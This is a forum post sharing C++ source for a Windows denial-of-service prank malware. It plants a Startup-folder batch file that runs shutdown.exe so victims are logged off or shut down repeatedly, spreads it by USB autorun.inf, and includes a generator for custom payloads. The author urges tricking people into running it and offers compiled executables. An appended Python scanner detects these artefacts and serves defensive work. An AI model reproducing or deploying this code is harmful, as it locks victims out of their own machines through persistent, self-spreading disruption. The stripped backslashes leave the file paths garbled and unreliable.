    tednugent

    Windows Exploit. Form and function.

    I've been working on this particular exploit for almost a year (since v1) namely because I don't usually feel like sitting down and learning new concepts in C++ which is what I've coded this exploit in. Basically, I started learning DOS a while back and came across the command shutdown.exe. After finding this command, I thought to myself "Gee, wouldn't it be great if I could make this command kill the Windows session on startup?" And from there what I refer to as Version .01 was born. I discovered Windows checks for a file called AUTOEXEC.BAT on startup under the C: > Documents and Settings > All users > Start Menu > Programs > Startup > (AUTOEXEC.BAT) folder. So you can open up notepad and write the lines:

    @echo off
    shutdown.exe -l
    exit

    and save the file as AUTOEXEC.BAT and manually move it to the path mentioned above. But this version has obvious limitations. So I began looking into basic file output in C++ and came across fstream. Using fstream, you can output files in a specified location. So open up your C++ editor (I used Dev-C++) and write:

    Code:
    #include <iostream>
    #include <stdlib.h>
    #include <stdio.h>
    #include <windows.h>
    #include <fstream.h>
    
    using namespace std;
    
    int main()
    {
     
        ofstream fout("C:documents and settingsall usersstart menuprogramsstartupAUTOEXEC.BAT");
        fout << "@echo offn";
        fout << "shutdown.exe -l";
        fout.close();
        system("shutdown.exe -l");
        return 0;
    //Compiled and tested in Dev-C++ courtesy of Rabbid George
    //Version 1.0
    }
    If you give this to someone and convince them to open it, it will install the file AUTOEXEC.BAT in the All users > Start Menu > Programs > Startup path, so that every time they start their computer it will run the file, which is set up to log the user off of their current session. As an added bonus, this file also uses the "system(shutdown.exe -l);" command, which runs DOS commands from your C++ program. This line logs the user off as soon as they open the file, and when they attempt to log back on, they will be logged off. You can even run this file from a portable storage device, and infect users without ever touching their mouse or keyboard. Simply load the file on a flash drive (for example) and put the above compiled file on it and an "autorun.inf" file which should read:

    [autorun]
    open="nameoffile.exe"

    Save the file as autorun.inf and when the flash drive is plugged into a logged on user's computer it will automatically run the file that will log the user off and continue to do so.

    But this isn't all that can be done with this command. I created Version 2 which allows you to customize shutdown.exe switches, even if you have no idea how to program or use DOS. This command runs code that lets you decide how to infect the user, giving you the choice to log them off, reboot their computer, or shut down their computer. You can also use a timer (if you use either the reboot or shut down options) in seconds, so that the computer will not turn off/reboot until the timer has expired. If you choose to use a timer, you may also leave a comment for your victims. The major downsides to this version (which I have NOT fixed) are: There is a glitch in comments, and: it outputs a file you must compile. The glitch in comments is avoidable only as follows: The first character read by the comment interpreter is deleted. That is to say "Hi there" would output as " there" (Note that it leaves the space.) so you should leave a word/char that does not mean anything. Eg: "asdf DIE" would show up as " DIE".

    Code:
    #include <iostream>
    #include <stdlib.h>
    #include <windows.h>
    #include <fstream>
    #include <string>
    
    using namespace std;
    using std::string;
    
    int main()
    {
        
    
        string qstn;
        string cmmt;
        string option;
        string random;
        int timer;
        int initltimer;
        
        system(title DOSrus 2.0 FINAL); 
        
        cout << "This is the FINAL version of DOSrus version 2.0.n";
        cout << "-r, -l, or -s.n";
        cin >> option;
        system("cls");
        
        cout << "Timer: (0 = no timer.)n";
        cin >> timer;
        system("cls");
        
        cout << "Comment:n";
        cin >> cmmt;
        getline(cin, cmmt);
        system("cls");
    
        
        system("cls");
        
        ofstream fout ("C:custom.cpp");
        fout << "#include <iostream>n";
        fout << "#include <stdlib.h>n";
        fout << "#include <stdio.h>n";
        fout << "#include <windows.h>n";
        fout << "#include <fstream.h>nn";
        fout << "using namespace std;nn";
        fout << "int main()n";
        fout << "{nn";
        fout << "ofstream fout ("C:documents and settingsall usersstart menuprogramsstartupAUTOEXEC.BAT");n";
        fout << "fout << "shutdown.exe -t " << timer << " " << option << " -c "" << cmmt <<  """;n";
        fout << "fout.close();n";
        fout << "system("shutdown.exe -t " << timer << " " << option << " -c "" << cmmt <<  """);n";
        fout << "return 0;n";
        fout << "}";
        fout.close();
            
        cout << "The file is ready; enjoy. :-)n";
        cin >> random;
        
        return 0;
        
    //Compiled and tested in Dev-C++ Courtesy of Rabbid George
    //Version 2.0
    }
    This should compile in Dev-C++ the first attempt.

    IMPORTANT NOTE: DO NOT COMPILE AND RUN (F9 in Dev-C++)
    ONLY COMPILE! (CTRL + F9 in Dev-C++).

    -Rabbid George.


    edit: just noticed the \s aren't kept in the interpreter. PM me for pre-compiled exe's.
    Last edited by tednugent; 10-29-2008 at 11:39 PM.
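
Added example, not part of tednugent's post: a defender-side triage check for the two artefacts the post describes, a batch file in a Startup folder that calls shutdown.exe with -l, -r or -s, and an autorun.inf whose [autorun] section launches a program. The function names and the sample files are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Added example; names are illustrative. Matches shutdown[.exe] with -l/-r/-s (or /l etc.).
SHUTDOWN_RE = re.compile(r"\bshutdown(?:\.exe)?\b[^\r\n]*?[-/]([lrs])\b", re.I)
SCRIPT_EXTS = {".bat", ".cmd"}

def scan_startup(startup_dir):
    """Return (file name, line number, switch) for each shutdown call found."""
    hits = []
    for path in sorted(Path(startup_dir).iterdir()):
        if path.suffix.lower() not in SCRIPT_EXTS:
            continue
        for num, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
            if line.strip().lower().startswith(("rem ", "::")):
                continue  # commented-out line
            m = SHUTDOWN_RE.search(line)
            if m:
                hits.append((path.name, num, m.group(1).lower()))
    return hits

def autorun_targets(drive_root):
    """Return the open=/shellexecute= targets from [autorun] in autorun.inf."""
    targets = []
    for entry in Path(drive_root).iterdir():
        if entry.name.lower() != "autorun.inf":
            continue
        section = ""
        for line in entry.read_text(errors="replace").splitlines():
            line = line.strip()
            if line.startswith("[") and line.endswith("]"):
                section = line[1:-1].strip().lower()
            elif section == "autorun" and "=" in line:
                key, value = line.split("=", 1)
                if key.strip().lower() in ("open", "shellexecute"):
                    targets.append(value.strip().strip('"'))
    return targets

def demo():
    """Run both checks on constructed sample files in a temp directory."""
    with tempfile.TemporaryDirectory() as tmp:
        startup, usb = Path(tmp, "Startup"), Path(tmp, "usb")
        startup.mkdir()
        usb.mkdir()
        (startup / "AUTOEXEC.BAT").write_text("@echo off\nshutdown.exe -l\nexit\n")
        (startup / "notes.bat").write_text("rem shutdown -s\necho hello\n")
        (usb / "autorun.inf").write_text('[autorun]\nopen="nameoffile.exe"\n')
        return scan_startup(startup), autorun_targets(usb)
```

Point `scan_startup` at each Startup folder on the host or on a mounted disk image, and `autorun_targets` at the root of a removable drive before it is opened on a workstation. On the mitigation side, AutoRun for removable media is governed by the Windows `NoDriveTypeAutoRun` policy value.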
